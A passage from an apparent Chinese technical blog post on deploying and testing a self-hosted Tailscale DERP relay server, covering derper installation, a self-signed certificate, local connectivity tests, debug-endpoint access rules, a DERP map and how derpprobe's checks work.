<strong>Tailscale 的 STUN 服务只需要一个开放的 UDP 端口即可，再没有其他苛刻的条件了</strong>。</p><h2 id="四、DERP-测试搭建">四、DERP 测试搭建</h2><h3 id="1-安装-derper-服务">1. <strong>安装 derper 服务</strong></h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 去 https://go.dev/dl/ 下载最新版（一定要下载版本，而非 apt-get install golang）</span></span><br><span class="line">wget https://go.dev/dl/go1.21.3.linux-amd64.tar.gz</span><br><span class="line"><span class="built_in">rm</span> -rf /usr/local/go &amp;&amp; tar -C /usr/local -xzf go1.21.3.linux-amd64.tar.gz</span><br><span class="line"><span class="built_in">rm</span> go1.21.3.linux-amd64.tar.gz</span><br><span class="line"><span class="built_in">export</span> PATH=<span class="variable">$PATH</span>:/usr/local/go/bin</span><br><span class="line"></span><br><span class="line"><span class="comment"># 确定安装是否成功 </span></span><br><span class="line">go version</span><br><span class="line"><span class="comment"># 查看 GOROOT 和 GOPATH 是否不为空 &amp; 可访问</span></span><br><span class="line">go <span class="built_in">env</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 配置 go 代理并安装</span></span><br><span class="line">go <span class="built_in">env</span> -w GOPROXY=https://goproxy.cn,direct</span><br><span class="line">go install tailscale.com/cmd/derper@latest</span><br><span class="line"><span class="comment"># 安装 derp probe 协助测试 derper</span></span><br><span class="line">go install tailscale.com/cmd/derpprobe@latest</span><br></pre></td></tr></table></figure><h3 id="2-创建自签名证书">2. 创建自签名证书</h3><p>创建自签名证书主要是糊弄 derper 用的，让它运行 HTTPS 服务；也可以改 derper 代码来绕过这个限制，但这么做后续也不方便更新 derper。</p><p>创建自签名证书有几个注意点：</p><ol><li><strong>先随便想一个 <em>HostName</em></strong>，这里我想的是 <code>kiprey-derp</code>。但是要注意这个 HostName 一定要记住，后面证书签名包括请求访问等等都会用到。</li><li>证书生成后，私钥文件和证书文件名的前缀都要改为 <em>HostName</em>。</li></ol><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">mkdir</span> ~/certdir &amp;&amp; <span class="built_in">cd</span> ~/certdir</span><br><span class="line"><span class="comment"># 1. 生成私钥</span></span><br><span class="line">$ DERP_HOST=<span class="string">&quot;kiprey-derp&quot;</span></span><br><span class="line">$ openssl genpkey -algorithm RSA -out <span class="variable">$&#123;DERP_HOST&#125;</span>.key   </span><br><span class="line">...</span><br><span class="line"></span><br><span class="line"><span class="comment"># 2. 生成证书请求 (CSR)：</span></span><br><span class="line">$ openssl req -new -key <span class="variable">$&#123;DERP_HOST&#125;</span>.key -out <span class="variable">$&#123;DERP_HOST&#125;</span>.csr</span><br><span class="line"><span class="comment"># 一路放空按 enter 即可。</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 3. 生成自签名证书，设置过期期限为 100 年，防止后续再重新操作</span></span><br><span class="line">$ openssl x509 -req \</span><br><span class="line">-days 36500 \</span><br><span class="line">-<span class="keyword">in</span> <span class="variable">$&#123;DERP_HOST&#125;</span>.csr \</span><br><span class="line">-signkey <span class="variable">$&#123;DERP_HOST&#125;</span>.key \</span><br><span class="line">-out <span class="variable">$&#123;DERP_HOST&#125;</span>.crt \</span><br><span class="line">-extfile &lt;(<span class="built_in">printf</span> <span class="string">&quot;subjectAltName=DNS:<span class="variable">$&#123;DERP_HOST&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 4. 查看生成的证书</span></span><br><span class="line">$ openssl x509 -<span class="keyword">in</span> <span class="variable">$&#123;DERP_HOST&#125;</span>.crt -noout -text </span><br><span class="line">Certificate:</span><br><span class="line">    Data:</span><br><span class="line">        Version: 3 (0x2)</span><br><span class="line">        ...</span><br><span class="line">        Issuer: C = AU, ST = Some-State, O = Internet Widgits Pty Ltd</span><br><span class="line">        Validity</span><br><span class="line">            Not Before: Nov 12 05:17:34 2023 GMT</span><br><span class="line">            Not After : Oct 19 05:17:34 2123 GMT</span><br><span class="line">        Subject: C = AU, ST = Some-State, O = Internet Widgits Pty Ltd</span><br><span class="line">        ...</span><br><span class="line">        X509v3 extensions:</span><br><span class="line">            X509v3 Subject Alternative Name: </span><br><span class="line">                DNS:kiprey-derp</span><br><span class="line">            ...</span><br><span class="line">    ...</span><br></pre></td></tr></table></figure><h3 id="3-运行-derper-服务">3. <strong>运行 derper 服务</strong></h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 启动 derper</span></span><br><span class="line"><span class="comment"># 因为 derp 在启用 HTTPS 后会自动监听 HTTP，所以指定 HTTP PORT 为 -1 将其禁用</span></span><br><span class="line">~/go/bin/derper \</span><br><span class="line">    -c ~/.derper.key \</span><br><span class="line">    -a :8888 -http-port -1 \</span><br><span class="line">    -stun-port 8889 \</span><br><span class="line">    -hostname <span class="variable">$&#123;DERP_HOST&#125;</span> \</span><br><span class="line">    --certmode manual \</span><br><span class="line">    -certdir ~/certdir \</span><br><span class="line">    --verify-clients</span><br></pre></td></tr></table></figure><h3 id="4-测试连通性">4. 测试连通性</h3><p>以下是 HTTPS 协议 DERP 服务的连通性测试过程：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">unset</span> all_proxy http_proxy https_proxy</span><br><span class="line"><span class="comment"># --insecure 表示使用 TLS-Insecure</span></span><br><span class="line"><span class="comment"># --resolve 表示将 DERP_HOST 绑定至本地的  127.0.0.1</span></span><br><span class="line">$ curl --insecure --resolve <span class="string">&quot;<span class="variable">$&#123;DERP_HOST&#125;</span>:8888:127.0.0.1&quot;</span> <span class="string">&quot;https://<span class="variable">$&#123;DERP_HOST&#125;</span>:8888&quot;</span></span><br><span class="line">&lt;html&gt;&lt;body&gt;</span><br><span class="line">&lt;h1&gt;DERP&lt;/h1&gt;</span><br><span class="line">&lt;p&gt;</span><br><span class="line">  This is a</span><br><span class="line">  &lt;a href=<span class="string">&quot;https://tailscale.com/&quot;</span>&gt;Tailscale&lt;/a&gt;</span><br><span class="line">  &lt;a href=<span class="string">&quot;https://pkg.go.dev/tailscale.com/derp&quot;</span>&gt;DERP&lt;/a&gt;</span><br><span class="line">  server.</span><br><span class="line">&lt;/p&gt;</span><br><span class="line">&lt;p&gt;Debug info at &lt;a href=<span class="string">&#x27;/debug/&#x27;</span>&gt;/debug/&lt;/a&gt;.&lt;/p&gt;</span><br><span class="line"></span><br><span class="line"><span class="comment"># 测试 UD 协议 STUN 服务的连通性</span></span><br><span class="line">$ nc 127.0.0.1 8889 -v -u</span><br><span class="line">Connection to 127.0.0.1 8889 port [udp/*] succeeded!</span><br></pre></td></tr></table></figure><p><strong>测试的时候一定要关闭代理！不然访问 localhost 就会走代理</strong>，导致：<br><code>curl: (35) error:0A000126:SSL routines::unexpected eof while reading</code></p><p><img src="/2023/11/tailscale-derp/Untitled%202.png" alt="Untitled"></p><p>需要注意的是，在访问 DERP 的 HTTPS 服务时，只能用之前指定的 <em>DERP_HOST</em> 这个 HostName 来进行访问，因为 <strong>DERP 服务会对 Client 的连接进行校验，确保 Client 发送来的 ServerName 与本地证书的 HostName</strong> 一致：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// cmd/derper/derper.go</span></span><br><span class="line"><span class="comment">// --------------------</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> &#123;</span><br><span class="line">...</span><br><span class="line"><span class="keyword">if</span> serveTLS &#123;</span><br><span class="line">log.Printf(<span class="string">&quot;derper: serving on %s with TLS&quot;</span>, *addr)</span><br><span class="line"><span class="keyword">var</span> certManager certProvider</span><br><span class="line">certManager, err = certProviderByCertMode(*certMode, *certDir, *hostname)</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">log.Fatalf(<span class="string">&quot;derper: can not start cert provider: %v&quot;</span>, err)</span><br><span class="line">&#125;</span><br><span class="line">httpsrv.TLSConfig = certManager.TLSConfig()</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 1. 会在 Client 连接时尝试从 Client Hello 信息中获取证书</span></span><br><span class="line">getCert := httpsrv.TLSConfig.GetCertificate</span><br><span class="line">httpsrv.TLSConfig.GetCertificate = <span class="function"><span class="keyword">func</span><span class="params">(hi *tls.ClientHelloInfo)</span></span> (*tls.Certificate, <span class="type">error</span>) &#123;</span><br><span class="line">cert, err := getCert(hi)</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">&#125;</span><br><span class="line">cert.Certificate = <span class="built_in">append</span>(cert.Certificate, s.MetaCert())</span><br><span class="line"><span class="keyword">return</span> cert, <span class="literal">nil</span></span><br><span class="line">&#125;</span><br><span class="line">    ...</span><br><span class="line">...</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// cmd/derper/cert.go</span></span><br><span class="line"><span class="comment">// ------------------</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="params">(m *manualCertManager)</span></span> getCertificate(hi *tls.ClientHelloInfo) (*tls.Certificate, <span class="type">error</span>) &#123;</span><br><span class="line"><span class="comment">// 2. 在获取证书时会先判断 Client 请求的 ServerName 是否与本地指定的 hostname 一致</span></span><br><span class="line">  <span class="keyword">if</span> hi.ServerName != m.hostname &#123;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;cert mismatch with hostname: %q&quot;</span>, hi.ServerName)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Return a shallow copy of the cert so the caller can append to its</span></span><br><span class="line"><span class="comment">// Certificate field.</span></span><br><span class="line">certCopy := <span class="built_in">new</span>(tls.Certificate)</span><br><span class="line">*certCopy = *m.cert</span><br><span class="line">certCopy.Certificate = certCopy.Certificate[:<span class="built_in">len</span>(certCopy.Certificate):<span class="built_in">len</span>(certCopy.Certificate)]</span><br><span class="line"><span class="keyword">return</span> certCopy, <span class="literal">nil</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>因此在测试的时候，如果是使用 curl 访问则需要指定 <code>--resolve</code> 参数，来让发往 <code>DERP_HOST</code> 的请求最终能 resolve 到本地地址：</p><blockquote><p>curl --insecure <code>--resolve &quot;$&#123;DERP_HOST&#125;:8888:127.0.0.1&quot;</code> “<a href="https://$">https://$</a>{DERP_HOST}:8888”</p></blockquote><p>如果我们直接用浏览器打开的话，页面还是比较简洁的：</p><blockquote><p>注：想用浏览器打开该 HTTPS 服务，要么做地址绑定，要么再建一个 <code>DERP_HOST=localhost</code> 的证书，此处不再赘述。</p></blockquote><p><img src="/2023/11/tailscale-derp/Untitled%203.png" alt="Untitled"></p><p>点击 <code>/debug</code>，这将会打开一些调试用的数据页面，如果我们再进一步的点击，就可以发现在源代码里经常设置的调试字段。我们可以利用这里的字段来间接判断 DERP/STUN 是否工作正常。</p><p><img src="/2023/11/tailscale-derp/Untitled%204.png" alt="Untitled"></p><p>这个非常有用，因为我们可以通过这种方式来确认 <strong>DERP 服务和 STUN 服务是可以指定同一个端口并正常工作</strong>的（因为两个服务一个使用 TCP 一个使用 UDP）：</p><blockquote><p>nc 上去后初始时 not_stun 值为 5，在发送三行数据后值变为了 8。</p></blockquote><p><img src="/2023/11/tailscale-derp/Untitled%205.png" alt="Untitled"></p><blockquote><p>那么 Zerotier 那一套操作就可以直接套在 Tailscale DERP 服务器上了（mix-port）。</p></blockquote><h3 id="5-DEBUG-防护">5. DEBUG 防护</h3><p>出于安全性的考虑，我们希望在实际部署时关闭掉这个 debug 模式，那该如何操作？</p><p>这个实际上已经不需要我们操心，从 <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/tsweb/tsweb.go#L53">tsweb/tsweb.go#L53</a> 中可以看出，它只会为满足几个条件的 debug 请求放行：</p><ol><li>请求来源为本地回环 IP、tailscale IP 以及 TS_ALLOW_DEBUG_IP 指定的 IP。</li><li>请求不为 GET 方式且携带 debugkey ，同时 debugkey 的内容与 TS_DEBUG_KEY_PATH 所指定文件的内容相同。</li></ol><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// AllowDebugAccess reports whether r should be permitted to access</span></span><br><span class="line"><span class="comment">// various debug endpoints.</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">AllowDebugAccess</span><span class="params">(r *http.Request)</span></span> <span class="type">bool</span> &#123;</span><br><span class="line"><span class="keyword">if</span> allowDebugAccessWithKey(r) &#123;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">true</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> r.Header.Get(<span class="string">&quot;X-Forwarded-For&quot;</span>) != <span class="string">&quot;&quot;</span> &#123;</span><br><span class="line"><span class="comment">// TODO if/when needed. For now, conservative:</span></span><br><span class="line"><span class="keyword">return</span> <span class="literal">false</span></span><br><span class="line">&#125;</span><br><span class="line">ipStr, _, err := net.SplitHostPort(r.RemoteAddr)</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">false</span></span><br><span class="line">&#125;</span><br><span class="line">ip, err := netip.ParseAddr(ipStr)</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">false</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> tsaddr.IsTailscaleIP(ip) || ip.IsLoopback() || ipStr == envknob.String(<span class="string">&quot;TS_ALLOW_DEBUG_IP&quot;</span>) &#123;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">true</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">false</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">allowDebugAccessWithKey</span><span class="params">(r *http.Request)</span></span> <span class="type">bool</span> &#123;</span><br><span class="line"><span class="keyword">if</span> r.Method != <span class="string">&quot;GET&quot;</span> &#123;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">false</span></span><br><span class="line">&#125;</span><br><span class="line">urlKey := r.FormValue(<span class="string">&quot;debugkey&quot;</span>)</span><br><span class="line">keyPath := envknob.String(<span class="string">&quot;TS_DEBUG_KEY_PATH&quot;</span>)</span><br><span class="line"><span class="keyword">if</span> urlKey != <span class="string">&quot;&quot;</span> &amp;&amp; keyPath != <span class="string">&quot;&quot;</span> &#123;</span><br><span class="line">slurp, err := os.ReadFile(keyPath)</span><br><span class="line"><span class="keyword">if</span> err == <span class="literal">nil</span> &amp;&amp; <span class="type">string</span>(bytes.TrimSpace(slurp)) == urlKey &#123;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">true</span></span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">false</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>实际测试如下：</p><p><img src="/2023/11/tailscale-derp/Untitled%206.png" alt="Untitled"></p><h3 id="6-编写-DERP-MAP">6. <strong>编写 DERP-MAP</strong></h3><blockquote><p>在本文章中，为了区分开 DERP 和 STUN 服务的不同，这两个服务<strong>暂不指定至相同的端口</strong>。</p></blockquote><blockquote><p>DERP map 的编写可以参考官方: <a href="https://login.tailscale.com/derpmap/default">derp-map - tailscale</a></p></blockquote><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;Regions&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">      <span class="attr">&quot;233&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">        <span class="attr">&quot;RegionID&quot;</span><span class="punctuation">:</span> <span class="number">233</span><span class="punctuation">,</span></span><br><span class="line">        <span class="attr">&quot;RegionCode&quot;</span><span class="punctuation">:</span> <span class="string">&quot;useless-region-code&quot;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="attr">&quot;Nodes&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">          <span class="punctuation">&#123;</span></span><br><span class="line">            <span class="attr">&quot;Name&quot;</span><span class="punctuation">:</span> <span class="string">&quot;test-derp&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;RegionID&quot;</span><span class="punctuation">:</span> <span class="number">233</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;HostName&quot;</span><span class="punctuation">:</span> <span class="string">&quot;kiprey-derp&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;IPv4&quot;</span><span class="punctuation">:</span> <span class="string">&quot;127.0.0.1&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;IPv6&quot;</span><span class="punctuation">:</span> <span class="string">&quot;::1&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;DERPPort&quot;</span><span class="punctuation">:</span> <span class="number">8888</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;STUNPort&quot;</span><span class="punctuation">:</span> <span class="number">8889</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;InsecureForTests&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span></span><br><span class="line">          <span class="punctuation">&#125;</span></span><br><span class="line">        <span class="punctuation">]</span></span><br><span class="line">      <span class="punctuation">&#125;</span></span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line">  <span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><blockquote><p>注意：1. HostName 填写为先前确定的那一个 DERP_HOST，用于传递给 Server 校验；InsecureForTests 用于让客户端跳过证书校验。</p></blockquote><p>将其保存为 derp-map.json 并运行：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">$ ~/go/bin/derpprobe -derp-map file://<span class="variable">$HOME</span>/derp-map.json -once</span><br><span class="line">2023/11/12 15:01:38 Waiting <span class="keyword">for</span> all probes (may take up to 1m)</span><br><span class="line">2023/11/12 15:01:40 adding DERP TLS probe <span class="keyword">for</span> test-derp ()</span><br><span class="line">2023/11/12 15:01:40 adding DERP UDP probe <span class="keyword">for</span> test-derp (derp/useless-region-code/test-derp/udp6)</span><br><span class="line">2023/11/12 15:01:40 adding DERP UDP probe <span class="keyword">for</span> test-derp (derp/useless-region-code/test-derp/udp)</span><br><span class="line">2023/11/12 15:01:40 adding DERP mesh probe <span class="keyword">for</span> test-derp-&gt;test-derp ()</span><br><span class="line">2023/11/12 15:01:41 probe derp/useless-region-code/test-derp/tls: connecting to <span class="string">&quot;kiprey-derp:443&quot;</span>: dial tcp: lookup kiprey-derp on 127.0.0.53:53: server misbehaving</span><br><span class="line">2023/11/12 15:01:47 probe derp/useless-region-code/test-derp/test-derp/mesh: derp.Recv: EOF</span><br><span class="line">2023/11/12 15:01:54 good: derp/useless-region-code/test-derp/udp6: 667.205µs</span><br><span class="line">2023/11/12 15:01:54 good: derp/useless-region-code/test-derp/udp: 2.71478ms</span><br><span class="line">2023/11/12 15:01:54 good: derpmap-probe: 5.609009ms</span><br><span class="line">2023/11/12 15:01:54 bad: derp/useless-region-code/test-derp/test-derp/mesh: derp.Recv: EOF</span><br><span class="line">2023/11/12 15:01:54 bad: derp/useless-region-code/test-derp/tls: connecting to <span class="string">&quot;kiprey-derp:443&quot;</span>: dial tcp: lookup kiprey-derp on 127.0.0.53:53: server misbehaving</span><br></pre></td></tr></table></figure><p><strong>derpprobe 探测内容</strong></p><p>先简单说明一下 derpprobe 探测的内容，它主要是探测以下三种功能（功能位于<a href="https://github.com/tailscale/tailscale/blob/86c8ab75/prober/derp.go">prober/derp.go</a>）：</p><ol><li><em>DERP TLS probe</em>：只探测当前被测 DERP 服务器的 <strong>TLS 协议是否能正常建立 TLS 连接</strong>，不探测应用层数据（<a href="https://github.com/tailscale/tailscale/blob/86c8ab75/prober/derp.go#L58">prober/derp.go#L58</a> &amp; <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/prober/derp.go#L97">prober/derp.go#L97</a> &amp; <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/prober/tls.go#L29">prober/tls.go#L29</a>）。</li><li><em>DERP UDP probe</em>：探测当前被测 DERP 服务器上<strong>基于 UDP 的 STUN 服务</strong>是否正常（IPv4 &amp; IPv6 各探测一次，会建立连接并收发数据）（<a href="https://github.com/tailscale/tailscale/blob/86c8ab75/prober/derp.go#L113">prober/derp.go#L113</a> &amp; <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/prober/derp.go#L206">prober/derp.go#L206</a>）。</li><li><em>DERP mesh probe</em>：探测当前被测 DERP 服务器<strong>与同 Region 下其他 DERP 服务器的数据转发</strong>是否正常（<a href="https://github.com/tailscale/tailscale/blob/86c8ab75/prober/derp.go#L122">prober/derp.go#L122</a> &amp; <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/prober/derp.go#L139">prober/derp.go#L139</a> &amp; <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/prober/derp.go#L295">prober/derp.go#L295</a>）。</li></ol><p>可以看到输出的结果里存在错误，其错误有两点：</p><ol><li><p><strong>TLS 连接失败</strong>。阅读源代码发现 <em>DERP TLS probe</em> 连接 DERP 服务器的方式不太正宗，连接逻辑和常规客户端连接 DERP 服务器完全不同，并且只会请求访问配置中的 <strong>HostName 字段</strong>，而不会使用 <strong>IPv4/IPv6 字段</strong>(<a href="https://github.com/tailscale/tailscale/blob/86c8ab75/prober/derp.go#L97">prober/derp.go#L97</a>)，同时还不使用 <strong>InsecureForTests 字段</strong>来设置关闭证书验证，因此 TLS probe 的错误就无法处理了；不过这个错误也无关紧要。</p></li><li><p><strong>Prober 连接 DERP 服务失败</strong>。DERP 服务一直报如下信息的错误：</p> <figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">2023</span>/XX/XX XX:XX:XX derp: <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>:<span class="number">50566</span>: client xxxxx rejected: client nodekey:xxxxx not in set of peers</span><br></pre></td></tr></table></figure><p>通过调试发现是因为 prober 所使用的 client key 是<a href="https://github.com/tailscale/tailscale/blob/86c8ab75/prober/derp.go#L357">随机生成</a>的，因此 DERP 在指定 <code>—verify-clients</code> 后会将该 prober 连接阻断，在测试时需要去除 DERP 服务的这个参数，最终效果如下：</p><p><img src="/2023/11/tailscale-derp/Untitled%207.png" alt="Untitled"></p></li></ol><p>简单解释一下 Prober 的使用关键点：</p><ol><li><p>上图中本人在运行 derpprobe 时<strong>是直接运行最新源代码</strong>，而非通过 go install 预编译二进制文件的形式。这是因为在本人使用 derpprobe 时，刚好 derpprobe 正在修复bug，最新版本的修复代码尚未提交至 go pkg，因此是直接运行的源代码。</p></li><li><p>使用 Prober 时<strong>一定要清除 proxy</strong>，否则你就会发现本该连接成功的 HTTPS 请求在一个奇怪的地方被”劫持“，导致 prober 失败：</p><p><img src="/2023/11/tailscale-derp/Untitled%208.png" alt="Untitled"></p></li></ol><p>那么，derpprobe 的测试到此为止，接下来要实际部署进 tailscale 网络中来进行测试。</p><p><strong>DERP mesh probe 探测原理</strong></p><p>顺带说一下 DERP mesh probe 的探测原理，这个比较有意思，其目的是测试<strong>不同 client 连接同一个 Region（Cluster）时的数据转发效果</strong>，这里尤其需要考虑不同 client 连接至<strong>同一个 Region 但不同 Region Node</strong> 时消息的转发状态。其测试过程如下：</p><blockquote><p>为了避免混淆，规定 client1、client2 为非 DERP 服务的两个不同客户端节点；<strong>s</strong>client1、<strong>s</strong>client2 为 DERP 服务内对应创建的两个结构体，用来和 client1、client2 交互等等。</p></blockquote><ol><li><p>初始时，prober 会在 <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/prober/derp.go#L266">derpProbeNodePair 函数</a>里创建出两个<strong>分别连接不同 Region</strong> 的 client 结构 client1(连接 derp1) 和 client2(derp2)。这两个 client 使用了不同的密钥对，以假装是两个独立 Node 来对不同 DERP 发起连接。</p><p>但要知道的是，代码里只是传入了两个<strong>处于同一 Region 的不同 RegionNode</strong>，那该如何达到连接<strong>不同 Region</strong> 的目的呢？事实上，prober 会将这些 DERP 节点伪造成来自不同 Region 的节点（<a href="https://github.com/tailscale/tailscale/blob/86c8ab75/prober/derp.go#L364">prober/derp.go#L364</a>，注意所返回的 DERPRegion 的 Nodes 都是传入的单个节点，RegionID 相同没有影响）。</p></li><li><p>另一边，远程 DERP 服务会在收到 client 的连接请求后，调用 <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/derp/derp_server.go#L498">registerClient 函数</a>：</p><ol><li><p>在 DERP 服务本地维护一个结构体 <strong>sclient</strong>，保存每个 client 连接的状态以及尚未发出的信息。</p><blockquote><p>DERP 这里一个 <code>sclient</code> 结构配对 Client 端的一个 <code>derphttp.Client</code>。</p></blockquote></li><li><p>向正在 watch 本 DERP 服务连接状态的其他 DERP Client 广播该 client 的上线情况（例如是否上线、远程 IP 地址信息等等，<a href="https://github.com/tailscale/tailscale/blob/86c8ab75/derp/derp_server.go#L538">broadcastPeerStateChangeLocked 函数</a>）</p></li></ol></li><li><p>接下来，prober 会<strong>令 client1 发送随机 8 字节数据给 